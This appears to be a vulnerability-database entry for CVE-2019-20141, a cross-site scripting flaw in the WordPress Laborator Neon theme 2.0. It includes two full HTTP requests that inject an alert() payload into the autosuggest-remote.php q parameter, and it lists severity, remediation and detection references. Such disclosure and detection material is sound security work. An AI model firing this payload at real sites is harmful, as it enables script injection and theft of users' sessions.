🔙 목록으로 돌아가기

CVE-2019-20141: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting

TitleWordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
Authorknassar702
SeverityMedium
ImpactAttackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing administrative actions on behalf of users.
RemediationApply the latest security patch or update provided by the theme developer to fix the XSS vulnerability.
CVSS Score6.1
EPSS Score0.12494
CVE IDCVE-2019-20141
CWE IDCWE-79
Tags cve2019 cve xss laborator wordpress vuln

🔍 Vulnerability Description

WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.

🌐 HTTP Request

GET /data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-20141.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-20141.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A